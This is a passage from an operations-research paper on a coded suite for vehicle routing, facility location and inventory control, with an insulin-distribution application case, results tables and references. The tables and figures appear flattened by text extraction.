6520.50 6565.59 6943.25 6812.66 6604.67 6890.82 6462.06 0.02 9.00 6.02 14.19 doni3 3000 8 8446.08 9386.09 9164.45 9046.35 9210.88 9222.20 9284.65 9046.58 9078.15 9521.70 8764.82 0.02 9.05 3.77 12.76 doni4 4000 10 10854.48 11343.30 11554.67 12569.50 11727.37 12145.86 12228.30 11591.12 11749.20 12064.27 11900.86 0.03 9.52 4.50 15.80 doni5 5000 12 11134.94 12134.10 11826.50 12239.01 11795.63 11778.82 12228.90 11756.23 11630.03 11991.76 11688.43 0.02 7.46 4.45 13.58 11 12 13 14 15 16 17 18 19 20 SJC1 100 10 17359.75 18414.13 18771.68 18980.26 18920.01 18238.01 18801.80 19309.07 19110.21 18456.53 18044.67 SJC2 200 15 33181.65 33984.90 34244.03 34194.04 33933.64 33419.28 35572.49 34591.19 34987.62 34192.40 34202.39 SJC3a 300 25 45366.35 49957.54 50486.07 49110.78 49326.85 49819.80 50118.63 49121.94 49122.90 48504.67 49125.72 SJC3b 300 30 40695.46 42757.81 43491.62 43258.93 45979.48 46123.80 44577.86 43476.13 42845.84 43770.52 42757.56 SJC4a 402 30 61944.85 64684.17 66330.04 66942.44 64252.03 65602.74 66930.28 64881.96 66203.34 66084.76 66330.83 SJC4b 402 40 52214.55 56098.36 55717.76 55381.78 55560.09 56688.00 56007.38 55433.25 57244.58 55346.98 55156.16 doni1 1000 6 3021.41 3178.30 3289.38 3280.55 3255.53 3222.71 3285.68 3272.36 3209.67 3095.41 3150.72 doni2 2000 6 6080.70 6716.37 6523.83 6587.83 6514.85 6514.85 6757.51 6769.05 6450.75 6446.69 6792.99 doni3 3000 8 8446.08 9460.70 9121.97 9488.05 8788.67 9107.96 9004.30 9324.03 9316.03 9523.56 9352.43 doni4 4000 10 10854.48 11446.71 11908.09 12536.06 11531.49 12016.75 12263.57 11809.81 11522.08 11916.93 11938.64 doni5 5000 12 11134.94 12647.01 11733.33 11695.76 12072.83 11774.91 11937.90 11931.33 11879.98 12157.47 12410.48 Instance Instance N P BK Executions of the NNS Algorithm Executions of the NNS Algorithm Error Gap (%) CVBKPN Figure 13 Extended data for assessment of the NNS algorithm for CCCP. Full-size DOI: 10.7717/peerj-cs.329/fig-13 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 18/31 http://dx.doi.org/10.7717/peerj-cs.329/fig-12 http://dx.doi.org/10.7717/peerj-cs.329/fig-11 http://dx.doi.org/10.7717/peerj-cs.329/fig-13 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ A note on solving methods for the MFLP As with the CVRP, the MFLP is also of NP-hard complexity and it is very relevant to distribution performance. Main research is performed on the following contexts: � Problem modeling: within this context the following extensions can be mentioned: k-Balanced Center Location problem (Davoodi, 2019), Multi-Facility Weber Problem with Polyhedral Barriers (Akyüz, 2017), Multi-Commodity Multi-Facility Weber Problem (Akyüz, Öncan & Altinel, 2013), Multi-Facility Location-Allocation Problem with Stochastic Demands (Alizadeh et al., 2015), p-Center FLP with Disruption (Du, Zhou & Leus, 2020), and MFLP Models for Waste Management (Adeleke & Olukanni, 2020). � Problem solving: due to the complexity of the MFLP itself, most of the solving methods are based on meta-heuristics such as: Parallel Genetic Algorithms (P-GA) (Herda, 2017), Adaptive Biased Random-Key Genetic Algorithm (ABRKGA) (Chaves, Gonçalves & Nogueira-Lorena, 2018), and Spatial Optimization (Yao & Murray, 2020). Most recently, the use of Game Theory concepts has been proposed such as Nash Equilibria for MFLP with competition (Pelegrin, Fernandez & Garcia, 2018). To extend on these works, it is recommended to have basic proficiency regarding the general structure of a meta-heuristic method and its implementation through computer programing. The suite code nnscccp can provide both resources. APPLICATION CASE In this section an integrative case is presented to illustrate the application of the coded suite. This case is focused on the distribution of insulin, which is a vital product for people with chronic diseases such as pancreatic insufficiency or diabetes. This is because the main function of insulin is to regulate the concentrations of glucose and lipids in the blood stream. If there is a deficiency of insulin, the body cannot process these elements efficiently, leading to liver and kidney failure, damage to nerve cells, cognitive impairment, blindness and amputations (Olivares-Reyes & Arellano Plancarte, 2008; Berlanga-Acosta et al., 2020). Currently, the demand of insulin is increasing due to the high levels of diabetes (type 1 and type 2) within the general population (Mora-Morales, 2014; Tsilas et al., 2017). Frequently, people need different insulin prescriptions, and sometimes more than one person within a region needs insulin. This leads to variable demand patterns through the general population, and distribution must be planned accordingly to supply all demands. To address the associated logistic problem, the following steps are considered: a) Design a test instance with the two main features of the considered scenario: large demand locations within a geographic region, and demand patterns per location considering the characteristics of the distribution fleet and product. Operational costs associated to inventory management must be also designed for the considered product. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 19/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ b) Adapt the most appropriate routing model to formulate the distribution problem with inventory control to supply the considered product within a planning horizon. c) Adapt the most appropriate inventory control model to establish the distribution frequency through the planning horizon with minimization of costs. d) Select an appropriate solution method for the problem and analyze the results. e) Discuss on potential opportunities to improve the solution. The details of these steps are presented in the following sections. (a) Design the test instance By using the function generatedata a set of 550 normally-distributed location points, were generated. Then, by using the function rescaling these points were located within a specific geographic region. This methodology to generate the test instance is similar to the one proposed in Diaz-Parra et al. (2017) for the Oil Platform Transport Problem (OPTP) which is a variant of the CVRP (Diaz-Parra et al., 2017). From field data, the fleet of a regional distribution center for medicines typically consists of 6–10 standardized vehicles with temperature control. For this case, an homogeneous fleet of seven vehicles was considered for the set of 550 location points, and the distribution center was located at λ = −98.245678 and ϕ = 19.056784. The capacity of each vehicle was defined considering the characteristics of the product which consists of a pre-filled injection pen of 3 ml with 100 UI/ml (300 insulin units per pen) with an approximate cost of C = 20 USD and dimensions 0.10 × 0.20 × 0.085 = 0.0016 m3. By considering 1.0 m3 as the capacity of the vehicle’s container for insulin, its capacity in terms of the product was estimated as 1.0/0.0016 = 625 units. Finally, a planning horizon and reliable source data were considered to determine the demand patterns for the set of locations. The daily insulin dosage reported in Islam-Tareq (2018) was considered as input data for a Monte Carlo simulation model to provide statistical data (μ = mean units, σ = standard deviation units) regarding the cumulative demand for a 2-weeks planning horizon. Then, this statistical data was expressed in terms of units of products as each pen contains 300 insulin units. For reference purposes, an example of the geographic and demand data for the test instance of 550 locations points is presented in Table 3 and Table 4 respectively. The complete data is available within location_data.xlsx and extended_demand_data.xlsx. (b) Adapting the appropriate routing model Due to the characteristics of the input data, the CVRP was identified as the reference routing model. In this regard, there are variations of this model which can be applied on the application case such as the Periodic VRP (PVRP) and the Time-Windows VRP (TWVRP) (Francis, Smilowitz & Tzur, 2008). However, the standard CVRP was suitable for the application case as the distribution planning must be performed accordingly to the frequency of inventory replenishment. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 20/31 http://dx.doi.org/10.7717/peerj-cs.329/supp-3 http://dx.doi.org/10.7717/peerj-cs.329/supp-1 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ By defining the CVRP as the routing model, the function distmetrics was used to compute the distance matrix in kilometers (arc length) which is the input data for the CVRP. Because minimization of the inventory management costs is the main objective of the distribution scheme, the Total Inventory Cost of the inventory control model (see Figs. 5 and 7) was considered as the objective function. Particularly, the order cost Co is associated to the logistic operations of transportation and thus, it is directly associated to route planning and data from the distance matrix. In the following section, the integration of traveled distance (source data within the distance matrix) with Co is described considering the appropriate inventory control model. (c) Adapting the appropriate inventory control model As presented in Table 4 most of the demands have significant variability as their Coefficients of Variability (CVs) are bigger than 0.20. This led to consider a non- deterministic inventory control model such as (Q, R) and P. Because the product’s distribution must be performed periodically (each 2 weeks) it is recommended to synchronize it with the inventory supply frequency. For this purpose, the P model (periodic review) was considered as the most appropriate model because inventory replenishment through the (Q, R) model depends of the re-order point which may be reached at different times. Table 3 Example of location data (latitude, longitude) for the application case (generated by functions generatedata and rescaling). i λ ϕ … i λ ϕ 1 −98.2564 19.0307 … 501 −98.2328 19.0331 2 −98.2142 19.0379 … 502 −98.2165 19.0305 3 −98.2390 19.0366 … 503 −98.2234 19.0305 ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ 50 −98.2446 19.0198 … 550 −98.2135 19.0363 Note: Complete data is available within location_data.xlsx. Table 4 Statistical data of units of end-product (pre-filled pens) requested by the application case: coefficient of variability CV = σ/μ (generated by Monte Carlo Simulation). i μ σ CV … i μ σ CV 1 3 1 0.33 … 496 2 1 0.50 2 4 1 0.25 … 497 4 2 0.50 3 3 2 0.67 … 498 5 2 0.40 ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ 55 5 1 0.20 … 550 8 2 0.25 Note: Complete data is available within extended_demand_data.xlsx. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 21/31 http://dx.doi.org/10.7717/peerj-cs.329/supp-3 http://dx.doi.org/10.7717/peerj-cs.329/supp-1 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ The following parameters were considered to adapt the P model to estimate the net requirements for the present case: T = one period of 2-weeks (15 days), and LT = one day (1/15 = 0.07 of one period of 2-weeks). Note that under this assumption, d = μ (see Table 4) and z = 2.1700904 for a service level of 98.5%. Regarding costs, Co and Ch were estimated from the point of view of the ordering entity (i.e., drugstores, small clinics, and patients at home). Because ordering costs must cover the operating costs of the supplier which are dependent of the lot size and the service distance, Co was estimated as: Co ¼ ds � 1 de � dj þ dp (6) where ds is the diesel cost per liter, de is the efficiency of the vehicle (kilometers per liter), and dj is the cumulative distance up to the delivery point j (source data within the distance matrix). For a standard vehicle de was estimated as 12 kilometers per liter and ds as 1.10 USD per liter (based on regional costs). Because dj is directly associated to the traveled distance, its minimization was achieved through the application of the CVRP model (see function nnscvrp). Then, Ch was estimated as 5.0% of C. Table 5 presents an example of the net requirements (lot size Q) per location based on the P model considering a period between reviews of 2 weeks (see function periodicreview). These results represent the final demand data for the CVRP model. The complete data is available within Q_demand_data.xlsx. (d) Solution method and analysis of results Figure 14 presents an overview of the coded suite’s functions used to provide a solution for the application case. By having the test instance data, the first set of results was obtained by solving the CVRP through the function nnscvrp. These results consisted of seven capacity-restricted sub-routes (one for each vehicle) estimated to serve all 550 locations. These results are presented in Fig. 15. Then, the second set of results was obtained by computing the inventory management costs at each location (see Eq. 6) based on the visiting sequence defined by each sub-route Table 5 Demand as lot quantities (Q) based on the periodic review (P) for application case (computed by function periodicreview). i Q i Q … i Q 1 6 51 6 … 501 5 2 7 52 8 … 502 7 3 8 53 7 … 503 11 ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ 50 8 100 7 … 550 14 Note: Complete data is available within Q_demand_data.xlsx. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 22/31 http://dx.doi.org/10.7717/peerj-cs.329/supp-4 http://dx.doi.org/10.7717/peerj-cs.329/supp-4 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ (see Fig. 15). Table 6 presents an example of the order cost (Co) and Total Inventory Cost (TC) computed at each location. The complete data is available within results_inventory_costs.xlsx. Data Collection– Design of Test Instance Solution Method and Analysis of Results Identification of the Logistic Problem • Homogeneous capacitated distribution / routing problem. • Variable demand patterns. Geographic Location Data Distribution Planning through CVRP Model generatedata rescaling Demand Data Monte-Carlo Simulation periodicreview nnscvrp Cost Analysis periodicreview Distance Metric distmetrics Figure 14 Methodology and functions used to provide a solution for the application case. Full-size DOI: 10.7717/peerj-cs.329/fig-14 Sequence R1 0 500 266 49 128 452 205 48 374 471 221 14 145 356 38 433 93 369 179 100 462 203 523 364 208 546 103 62 109 340 178 342 280 88 544 260 37 248 58 126 10 397 307 162 65 32 273 69 428 378 25 439 146 488 16 211 312 35 12 253 71 197 527 60 473 417 314 167 329 166 212 235 485 135 531 101 255 363 418 39 140 407 199 271 90 83 0 R2 0 242 536 196 138 348 102 464 515 449 183 483 334 256 219 94 474 95 344 225 171 383 341 86 160 306 384 73 325 175 300 520 122 381 72 469 247 398 121 210 270 380 220 84 191 371 414 291 254 309 361 159 97 352 301 304 3 506 89 542 533 323 55 406 143 277 59 315 45 108 75 124 80 395 486 467 269 499 214 192 528 376 457 415 130 353 0 R3 0 478 350 163 450 98 455 294 516 337 56 193 514 389 174 53 296 400 40 547 411 333 282 285 357 410 321 172 366 529 319 64 429 96 104 524 421 36 200 150 70 327 218 244 412 535 317 177 26 156 508 275 147 241 46 249 151 82 330 305 186 393 501 288 343 372 113 265 549 423 111 42 68 272 87 9 77 494 404 388 403 31 1 268 19 365 512 0 R4 0 507 181 416 22 453 425 91 81 401 85 231 30 521 228 17 497 223 339 47 436 545 206 503 20 518 442 252 346 227 137 129 373 132 292 190 548 476 526 466 263 447 335 446 437 328 226 517 207 133 165 513 318 419 229 134 110 290 154 24 51 201 245 426 28 385 399 451 480 267 502 188 246 298 420 63 408 13 519 153 105 274 21 43 286 490 0 R5 0 5 119 358 78 232 240 308 354 164 484 239 115 250 482 257 238 379 367 396 448 504 184 302 299 217 127 332 540 360 170 155 15 123 33 441 118 351 139 287 456 173 392 54 409 293 180 198 264 233 230 169 461 391 505 149 443 158 377 534 237 475 57 23 390 112 394 338 243 355 493 432 431 120 131 8 324 311 472 76 50 222 144 303 0 R6 0 487 320 278 116 182 157 92 458 148 99 11 481 187 289 468 387 67 430 375 313 496 537 41 479 61 424 522 491 259 194 74 463 34 459 224 543 6 204 251 454 382 541 438 511 216 44 4 310 440 492 530 106 52 279 107 18 215 213 445 209 79 349 498 27 2 185 347 262 550 125 295 236 477 525 495 322 284 510 326 359 283 142 413 168 117 427 0 R7 0 276 331 316 465 444 234 532 460 189 539 402 7 386 261 136 435 368 434 297 336 489 202 66 281 422 114 29 161 152 370 258 538 405 362 176 345 470 141 195 509 0 setuor-buS Distribution Center at Node 0 L a ti tu d e ( °) Longitude (°) B A Figure 15 Results of the distribution model as computed by the function nnscvrp. (A) Sub-routes. (B) Visualization of sub-routes. Full-size DOI: 10.7717/peerj-cs.329/fig-15 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 23/31 http://dx.doi.org/10.7717/peerj-cs.329/supp-5 http://dx.doi.org/10.7717/peerj-cs.329/fig-14 http://dx.doi.org/10.7717/peerj-cs.329/fig-15 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ From Table 6 (file results_inventory_costs.xlsx) the sum of all total costs associated to inventory management was computed as 1,016.5939 USD, where the total order cost was computed as 470.5898 USD. This represents a significant investment even if appropriate inventory control and distribution planning is performed. Nevertheless, these results constitute the reference data for improvements which can be obtained by extending on the availability of other distribution centers. This is addressed in the following section. (e) Opportunities for improvement From the previous results, the task of finding an alternative location for the distribution center (or distribution centers) was explored. First, a new location for the current distribution center was explored. By using the function nnscccp a new location was estimated at λ = −98.2266 and ϕ =19.0369. Then, the CVRP was solved through the function nnscvrp and the inventory management costs associated to each sub-route were computed. For this new location scenario, Table 7 presents an example of the order cost (Co) and Total Inventory Cost (TC) computed at each location. The complete data is available within results_inventory_costs_relocated_center.xlsx. From data of Table 7 (file results_inventory_costs_relocated_center.xlsx), the sum of all total costs was computed as 905.1940 USD for TC, and 355.1493 USD for Co. Table 6 Results of the inventory control model concerning Co and total cost (TC) as computed by the function periodicreview. i Co TC … i Co TC 1 1.2 1.96 … 496 0.4 1.05 2 1.0 1.89 … 497 0.4 1.74 3 0.7 1.88 … 498 1.0 2.42 ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ 55 0.8 1.75 … 550 1.2 2.86 Note: Complete data is available within results_inventory_costs.xlsx. Table 7 Results of the inventory control model concerning Co and total cost (TC) as computed by the function periodicreview with a new distribution center located by the function nnscccp (sub- routes estimated by function nnscvrp). i Co TC … i Co TC 1 0.7 1.44 … 496 0.7 1.37 2 0.6 1.46 … 497 0.3 1.62 3 1.1 2.25 … 498 0.6 1.97 ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ ⋅ ⋅ ⋅ … ⋅ ⋅ ⋅ 55 1.2 2.13 … 550 0.6 2.28 Note: Complete data is available within results_inventory_costs_relocated_center.xlsx. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 24/31 http://dx.doi.org/10.7717/peerj-cs.329/supp-5 http://dx.doi.org/10.7717/peerj-cs.329/supp-6 http://dx.doi.org/10.7717/peerj-cs.329/supp-6 http://dx.doi.org/10.7717/peerj-cs.329/supp-5 http://dx.doi.org/10.7717/peerj-cs.329/supp-6 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ This represents a reduction of (1 − 905.1940/1016.5939) × 100.0% = 10.958% and (1 − 355.1493/470.5898) × 100.0% = 24.531% respectively. By obtaining this improvement, the second step consisted on considering more distribution centers. Table 8 presents the total inventory management cost for the cases with three, four, five, six and seven distribution centers. It can be observed that there is a limit to increase the number of distribution centers to reduce the total inventory costs. A steady reduction is observed for up to five distribution centers. However, a steady increase is observed for six and seven distribution centers (which implies a vehicle per distribution center). Hence, it is important to consider that there is an optimal or near- optimal number of distribution centers to reduce the total costs associated to distance. Also, the achieved savings must compensate the investment required for this additional infrastructure within a suitable period of time. RESULTS AND CONCLUSIONS In this work the development of resources for logistic and inventory management research was presented. These resources were complemented with source code and implementation examples to motivate their learning and application. Specifically, the following aspects were covered by this coded suite: � development of instances for vehicle—routing/facility location instances with near-to- real geographical data; � development of instances with symmetric and asymmetric distance/cost data considering the main distance metrics available for modeling; � development of exporting and plotting codes for visualization and processing by third- party platforms; � development of implementation code to evaluate the performance of inventory management techniques with uncertain demand; � development of a nearest-neighbor search (NNS) with greedy randomized adaptive search procedure (GRASP) algorithm to (1) provide very suitable solutions to integrated facility location—inventory—vehicle routing problems, and (2) provide insights regarding how these solving methods work. This meta-heuristic could provide very suitable results for large CVRP and CCCP instances (>300 customers/locations); Table 8 General results of the inventory control model concerning Co and total cost (TC) as computed by the function periodicreview with three to seven distribution centers located by the function nnscccp (sub-routes estimated by function nnscvrp). Number of distribution centers Total Co TC 3 297.6238 847.6685 4 290.1440 840.1887 5 279.9094 829.9540 6 282.6311 832.6758 7 309.5225 859.5671 Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 25/31 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ � solution and analysis of an integrative problem with the main functions of the coded suite. It is important to mention that logistic research extends to many fields and problems, and these resources just represent a small fraction of them. Also, the developed codes are subject to improvements and thus, they can be extended in the following aspects: � integrate the use of public GIS data through the limited free service of Bing Maps and Google Maps as performed by Erdogan (2017a, 2017b); � integrate other meta-heuristics such as Tabu-Search (TS) and Ant-Colony Optimization (ACO) for a parallel execution of solving methods; � integrate logistic problems with non-linear objective functions. As introductory work, the present coded suite can provide the academic or professional with the key aspects to understand most of the associated works and tools reported in the specialized literature. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare that they have no competing interests. Author Contributions � Santiago-Omar Caballero-Morales conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: The code is available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.329#supplemental-information. REFERENCES Adamu I. 2017. Reorder quantities for (Q,R) inventory models. International Mathematical Forum 12(11):505–514 DOI 10.12988/imf.2017.610142. Adeleke OJ, Olukanni DO. 2020. Facility location problems: models, techniques, and applications in waste management. Recycling 5(10):1–20 DOI 10.3390/recycling5020010. Akyüz MH. 2017. The capacitated multi-facility Weber problem with polyhedral barriers: efficient heuristic methods. Computers & Operations Research 113:221–240. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 26/31 http://dx.doi.org/10.7717/peerj-cs.329#supplemental-information http://dx.doi.org/10.7717/peerj-cs.329#supplemental-information http://dx.doi.org/10.7717/peerj-cs.329#supplemental-information http://dx.doi.org/10.12988/imf.2017.610142 http://dx.doi.org/10.3390/recycling5020010 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ Akyüz MH, Öncan T, Altinel K. 2013. Beam search heuristics for the single and multi-commodity capacitated multi-facility weber problems. Computers & Operations Research 40(12):3056–3068 DOI 10.1016/j.cor.2013.07.013. Al-Harkan IM, Moncer H. 2007. A simulation optimization solution to the inventory continuous review problem with lot size dependent lead time. Arabian Journal for Science and Engineering 32(2):327–338. Alizadeh M, Mahdavi I, Mahdavi-Amiri N, Shiripour S. 2015. A capacitated location-allocation problem with stochastic demands using sub-sources: an empirical study. Applied Soft Computing 34:551–571 DOI 10.1016/j.asoc.2015.05.020. Aras N, Yumusak S, Altmel K. 2007. Solving the capacitated multi-facility weber problem by simulated annealing, threshold accepting and genetic algorithms. In: Doerner K, Gendreau M, Greistorfer P, Gutjahr W, Hartl R, Reimann M, eds. Metaheuristics: Progress in Complex Systems Optimization. Silver Spring: Springer US, 91–112. Archetti C, Speranza MG. 2014. A survey on matheuristics for routing problems. EURO Journal on Computational Optimization 2(4):223–246 DOI 10.1007/s13675-014-0030-7. Baldacci R, Mingozzi A, Roberti R. 2012. Recent exact algorithms for solving the vehicle routing problem under capacity and time window constraints. European Journal of Operational Research 218(1):1–6 DOI 10.1016/j.ejor.2011.07.037. Basu S, Sharma M, Ghosh P. 2015. Metaheuristic applications on discrete facility location problems: a survey. OPSEARCH 52(3):530–561 DOI 10.1007/s12597-014-0190-5. Berlanga-Acosta J, Mendoza-Mari Y, Rodriguez-Rodriguez N, Garcia-del-Barco-Herrera D, Garcia-Ojalvo A, Fernandez-Mayola M, Guillen-Nieto G, Valdes-Sosa PA. 2020. Burn injury insulin resistance and central nervous system complications: a review. Burns Open 4(2):41–52 DOI 10.1016/j.burnso.2020.02.001. Blatt AJ. 2012. Ethics and privacy issues in the use of GIS. Journal of Map & Geographic Libraries 8(1):80–84 DOI 10.1080/15420353.2011.627109. Braglia M, Castellano D, Marrazzini L, Song D. 2019. A continuous review (Q, r) inventory model for a deteriorating item with random demand and positive lead time. Computers and Operations Research 109:102–121 DOI 10.1016/j.cor.2019.04.019. Bräysy O, Gendreau M. 2005a. Vehicle routing problem with time windows, Part I: route construction and local search algorithms. Transportation Science 39(1):104–118 DOI 10.1287/trsc.1030.0056. Bräysy O, Gendreau M. 2005b. Vehicle routing problem with time windows, Part II: metaheuristics. Transportation Science 39(1):119–139 DOI 10.1287/trsc.1030.0057. Caballero-Morales SO, Martinez-Flores JL. 2020. Analysis and reduction of CO2 emissions and costs associated to inventory replenishment strategies with uncertain demand. Polish Journal of Environmental Studies 29(6):3997–4005 DOI 10.15244/pjoes/118807. Carotenuto P, Giordani S, Zaccaro A. 2014. A simulation-based approach for evaluating the impact of maritime transport on the inventory levels of an oil supply chain. Transportation Research Procedia 3:710–719 DOI 10.1016/j.trpro.2014.10.050. Cazabal-Valencia L, Caballero-Morales SO, Martinez-Flores JL. 2016. Logistic model for the facility location problem on ellipsoids. International Journal of Engineering Business Management 8(49):1–9 DOI 10.1177/1847979016668979. Chaves AA, Gonçalves JF, Nogueira-Lorena LA. 2018. Adaptive biased random-key genetic algorithm with local search for the capacitated centered clustering problem. Computers & Industrial Engineering 124:331–346 DOI 10.1016/j.cie.2018.07.031. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 27/31 http://dx.doi.org/10.1016/j.cor.2013.07.013 http://dx.doi.org/10.1016/j.asoc.2015.05.020 http://dx.doi.org/10.1007/s13675-014-0030-7 http://dx.doi.org/10.1016/j.ejor.2011.07.037 http://dx.doi.org/10.1007/s12597-014-0190-5 http://dx.doi.org/10.1016/j.burnso.2020.02.001 http://dx.doi.org/10.1080/15420353.2011.627109 http://dx.doi.org/10.1016/j.cor.2019.04.019 http://dx.doi.org/10.1287/trsc.1030.0056 http://dx.doi.org/10.1287/trsc.1030.0057 http://dx.doi.org/10.15244/pjoes/118807 http://dx.doi.org/10.1016/j.trpro.2014.10.050 http://dx.doi.org/10.1177/1847979016668979 http://dx.doi.org/10.1016/j.cie.2018.07.031 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ Chaves AA, Nogueira-Lorena LA. 2010. Clustering search algorithm for the capacitated centered clustering problem. Computers & Operations Research 37(3):552–558 DOI 10.1016/j.cor.2008.09.011. Chaves AA, Nogueira-Lorena LA. 2011. Hybrid evolutionary algorithm for the capacitated centered clustering problem. Expert Systems with Applications 38(5):5013–5018 DOI 10.1016/j.eswa.2010.09.149. Darwish MA. 2008. Joint determination of order quantity and reorder point ofcontinuous review model under quantity and freight rate discounts. Computers & Industrial Engineering 35:3902–3917. Daugherty P, Bolumole Y, Schwieterman M. 2017. Logistics research: what a long, strange trip it’s been. Transportation Journal 56(3):213–226 DOI 10.5325/transportationj.56.3.0213. Davoodi M. 2019. k-Balanced center location problem: a new multi-objective facility location problem. Computers & Operations Research 105:68–84 DOI 10.1016/j.cor.2019.01.009. De SK, Sana SS. 2015. Multi-criterion multi-attribute decision-making for an EOQ model in a hesitant fuzzy environment. Pacific Science Review A: Natural Science and Engineering 17(2):61–68 DOI 10.1016/j.psra.2015.11.006. Diaz-Parra O, Ruiz-Vanoye JA, Fuentes-Penna A, Bernabe-Loranca B, Perez-Ortega J, Barrera-Camara RA, Velez-Diaz D, Perez-Olguin NB. 2017. Oil Platform Transport Problem (OPTP) is NP-hard. International Journal of Combinatorial Optimization Problems and Informatics 8(3):2–19. Du B, Zhou H, Leus R. 2020. A two-stage robust model for a reliable p-center facility location problem. Applied Mathematical Modelling 77(1):99–114 DOI 10.1016/j.apm.2019.07.025. Eaton JW, Bateman D, Hauberg S, Wehbring R. 2018. GNU Octave version 4.4.0 manual: a high-level interactive language for numerical computations. Available at https://www.gnu.org/ software/octave/doc/v4.4.1/. Environmental Systems Research Institute. 2020. ArcGIS. Available at https://www.esri.com/en- us/arcgis/about-arcgis/overview. Erdogan G. 2017a. FLP spreadsheet solver. Available at https://people.bath.ac.uk/ge277/flp- spreadsheet-solver/. Erdogan G. 2017b. VRP spreadsheet solver. Available at https://people.bath.ac.uk/ge277/vrp- spreadsheet-solver/. Erturgut R. 2011. Increasing demand for logistics technician in business world and rising trend of logistics programs in higher vocational schools: Turkey case. Procedia - Social and Behavioral Sciences 15:2776–2780 DOI 10.1016/j.sbspro.2011.04.187. Francis PM, Smilowitz KR, Tzur M. 2008. The period vehicle routing problem and its extensions. In: Golden B, Raghavan, S, Wasil E, eds. The Vehicle Routing Problem: Latest Advances and New Challenges. Boston: Springer, 73–102. Google LLC. 2020. Google Maps Platform. Available at https://developers.google.com/learn/topics/ maps-platform. Hannan MA, Akhtar M, Begum RA, Basri H, Hussain A, Scavino E. 2018. Capacitated vehicle-routing problem model for scheduled solid waste collection and route optimization using PSO algorithm. Waste Management 71:31–41 DOI 10.1016/j.wasman.2017.10.019. Hariga M. 2009. A continuous review (Q,r) model with owned and rented storage facilities. In: Proceedings of the IEEE International Conference on Computers & Industrial Engineering (CIE 2009). 1297–1301. Caballero-Morales (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.329 28/31 http://dx.doi.org/10.1016/j.cor.2008.09.011 http://dx.doi.org/10.1016/j.eswa.2010.09.149 http://dx.doi.org/10.5325/transportationj.56.3.0213 http://dx.doi.org/10.1016/j.cor.2019.01.009 http://dx.doi.org/10.1016/j.psra.2015.11.006 http://dx.doi.org/10.1016/j.apm.2019.07.025 https://www.gnu.org/software/octave/doc/v4.4.1/ https://www.gnu.org/software/octave/doc/v4.4.1/ https://www.esri.com/en-us/arcgis/about-arcgis/overview https://www.esri.com/en-us/arcgis/about-arcgis/overview https://people.bath.ac.uk/ge277/flp-spreadsheet-solver/ https://people.bath.ac.uk/ge277/flp-spreadsheet-solver/ https://people.bath.ac.uk/ge277/vrp-spreadsheet-solver/ https://people.bath.ac.uk/ge277/vrp-spreadsheet-solver/ http://dx.doi.org/10.1016/j.sbspro.2011.04.187 https://developers.google.com/learn/topics/maps-platform https://developers.google.com/learn/topics/maps-platform http://dx.doi.org/10.1016/j.wasman.2017.10.019 http://dx.doi.org/10.7717/peerj-cs.329 https://peerj.com/computer-science/ Herda M. 2017. Parallel genetic algorithm for capacitated P-median problem. Procedia Engineering 192:313–317 DOI 10.1016/j.proeng.2017.06.054. Hovelaque V, Bironneau L. 2015. The carbon-constrained EOQ model with carbon emission dependent demand. International Journal of Production Economics 164:285–291 DOI 10.1016/j.ijpe.2014.11.022. Islam-Tareq T. 2018. Fuzzy logic: a contemporary technique in refining physicians’ prescribed total daily insulin dosage for Type 2 diabetes patients. Bachelor thesis. Department of Pharmacy, BRAC University. Kuczyńska-Chalada M, Furman J, Poloczek R. 2018. The challenges for logistics in the aspect of Iindustry 4.0. Multidisciplinaty Aspects of Production Engineering 1(1):553–559. Lee JY, Behnezhad A. 2015. Incremental quantity discounts in a periodic-review stochastic inventory model with a general demand distribution. International Journal of Mathematics in Operational Research 7(2):178–193 DOI 10.1504/IJMOR.2015.068291. Lee SH. 2018. Memetic algorithm for stochastic inventory optimization with seasonal demand. Master thesis. Erasmus School of Economics, Erasmus University Rotterdam. Lieberman G, Hillier F. 2000. Introduction to operations research. Seventh Edition. New York: McGraw-Hill. Liu XH, Shan MY, Zhang RL, Zhang LH. 2018. Green vehicle routing optimization based on carbon emission and multiobjective hybrid quantum immune algorithm. Mathematical Problems in Engineering 2018(7):1–10 DOI 10.1155/2018/8961505. Lloyd C, 